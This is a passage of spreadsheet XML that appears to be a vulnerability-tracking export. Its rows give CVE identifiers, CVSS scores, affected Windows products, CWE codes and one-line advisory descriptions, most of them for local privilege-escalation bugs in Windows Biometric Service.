        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="C936" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E936" s="5" t="inlineStr"/>
      <c r="F936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G936" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H93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936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L936" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="C937" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E937" s="5" t="inlineStr"/>
      <c r="F937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G937" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H937" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I937" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J937" s="5" t="inlineStr"/>
      <c r="K937" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L937" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="C938" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E938" s="5" t="inlineStr"/>
      <c r="F938" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G938" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H93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38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L938" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="C939" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E939" s="5" t="inlineStr"/>
      <c r="F939" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G939" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H93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39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L939" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="C940" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E940" s="5" t="inlineStr"/>
      <c r="F940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G940" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L940" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="C941" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E941" s="5" t="inlineStr"/>
      <c r="F941" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G941" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="L941" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="C942" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E942" s="5" t="inlineStr"/>
      <c r="F942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G942" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J942" s="5" t="inlineStr"/>
      <c r="K942" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L942" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="C943" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E943" s="5" t="inlineStr"/>
      <c r="F943" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G943" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L943" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="C944" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E944" s="5" t="inlineStr"/>
      <c r="F944" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G944" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L944" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="C945" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E945" s="5" t="inlineStr"/>
      <c r="F945" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G945" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L945" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="C946" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E946" s="5" t="inlineStr"/>
      <c r="F946" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G946" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H946" s="5" t="inlineStr"/>
      <c r="I946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L946" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="C947" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E947" s="5" t="inlineStr"/>
      <c r="F947" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G947" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L947" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="C948" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E948" s="5" t="inlineStr"/>
      <c r="F948" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G948" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L948" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="C949" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E949" s="5" t="inlineStr"/>
      <c r="F949" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G949" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H94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49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L949" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="C950" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E950" s="5" t="inlineStr"/>
      <c r="F950" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G950" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L950" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="C951" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E951" s="5" t="inlineStr"/>
      <c r="F951" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G951" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L951" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="C952" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E952" s="5" t="inlineStr"/>
      <c r="F952" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G952" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L952" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="C953" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E953" s="5" t="inlineStr"/>
      <c r="F953" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G953" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L953" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="C954" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E954" s="5" t="inlineStr"/>
      <c r="F954" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G954" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J954" s="5" t="inlineStr"/>
      <c r="K954" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L954" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="C955" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E955" s="5" t="inlineStr"/>
      <c r="F955" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G955" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L955" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="C956" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E956" s="5" t="inlineStr"/>
      <c r="F956" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G956" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H956" s="5" t="inlineStr"/>
      <c r="I956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L956" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="C957" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E957" s="5" t="inlineStr"/>
      <c r="F957" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G957" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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57" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L957" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="C958" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E958" s="5" t="inlineStr"/>
      <c r="F958" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G958" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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58" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L958" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="C959" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E959" s="5" t="inlineStr"/>
      <c r="F959" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G959" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H95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959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L959" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="C960" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E960" s="5" t="inlineStr"/>
      <c r="F960" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G960" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H960" s="5" t="inlineStr"/>
      <c r="I960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L960" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="C961" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E961" s="5" t="inlineStr"/>
      <c r="F961" s="5" t="n">
        <v>0.003</v>
      </c>
